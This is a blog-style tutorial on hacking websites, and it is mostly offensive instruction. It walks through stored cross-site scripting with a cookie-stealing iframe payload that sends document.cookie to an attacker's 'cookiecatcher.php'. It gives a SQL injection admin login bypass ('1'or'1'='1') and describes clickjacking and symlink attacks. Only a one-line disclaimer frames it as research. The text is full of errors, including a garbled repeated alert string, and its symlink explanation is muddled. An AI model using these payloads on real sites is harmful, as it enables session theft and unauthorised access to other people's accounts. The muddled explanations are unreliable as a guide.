Method 1: Using Cross Site Scripting
Step 1:First step to be followed i to find a vulnerable site where yo can post your text. if the site is secure then this will not work.window.alert(“test”)window.alert(“test”)window.alert(“test”)
Step 2:Now create a post and write some special code into the “post” which will capture the data of all who click on it. Test the system if it filters out code. Post
<script>window.alert(“test”)</script>
If an alert box appears in front of you then the site is vulnerable to attack.
Step 3: Create and upload your cookie catcher.
The main idea to create this is to capture a user’s cookie which helps in accessing to their account for websites with vulnerable logins. For this, you need a cookie catcher which will capture your target’s cookies and divert them. Upload the catcher to a website you have accessed to and that supports php too.
Step 4:Post with your cookie catcher.
Input the code into the post which will capture the cookies and sent them to your site too. You wishe to put in some text after the code to reduce suspicion and keep it away from deleting.
An example code would look like
<iframe frameborder=”0″ height=”0″ width=”0″ src=”javascript…:void(document.location=’YOURURL/cookiecatcher.php?c=’ document.cookie)></iframe>
Method 2: Executing Injection Attacks
Step 1: You need to find a vulnerable site due to an easily accessible admin login.Try searching it.
Step 2:Now, Login as an admin. Type admin as the username and use one of a number of different strings as the password. Take a example: 1’or’1’=’1.It will take few seconds.
Step 3: Access the website. You will be able to find a string that allows you admin access to a website assuming the site is vulnerable to attack.
Method 3: Setting Up For Success
Step 1:If you really want to learn how to hack websites you must know one or two languages like Python or SQL and how computers and technologies work for the better control of computers and to find vulnerabilities in system.
Step 2:You must be familiar about HTML literacy and Java Script to hack websites in particular.
Step 3: You must consult with whitehats. These are the hackers who use their powers for good, exposing security vulnerabilities. If you want to hack websites and protect your own site, must contact with the whitehats.
Step 4: Research hacking. To protect your own site or to learn hacking, you must be trained in field of researching. There are many was and list keeps on changing.
Sep 5: Keep up to date. As the list keeps on changing , you must be sure that you are up to date. If you are protected from certain types of hack then only you are safe in future.
Method 4: ClickJacking Attacks
ClickJacking is also called a UI Redress Attack . It is this when a hacker uses multiple opaque layers to trick a user into clicking the top layer without knowing them. The attacker is “hijacking” that is not meant for the actual page loaded but for a page where the attacker wants you to be. Let us take an example i.e using a carefully crafted combinations of stylesheets,iframes and text boxes. By this a user can led to believe they are typing in the password for bank account but they are writing into an invisible space that is controlled by the attacker which is not visible to the user.
Method 5: SYMLINKING
A symlink is a special file that “points to” a hard link on a mounted file system. A symlinking attack occurs when a hacker places the symlink in such a way that the user access the endpoint thinks they are accessing the correct file.
If the endpoint file is an output, the consequence of the symlink attack is that it can be easily modified alternatively of the file at the deliberate location. Modifications include like appending, overwriting,corrupting or even changing permissions.
In various situations, hacker may be able to control the changes to a file, grant themselves approach access, insert wrong information, reveal sensitive information or destroy vital system or files or applications. And therefore better is to secure your websites.
Note:- Article is only for knowledge and research purpose, do not use it in any illegal way, i am not responsible for anything happen.
Friends, If You Like The Post Kindly Comment Below The Post And Do Share Your Response, Thanks For Reading.. ๐ ๐ฒ
0 comments:
Post a Comment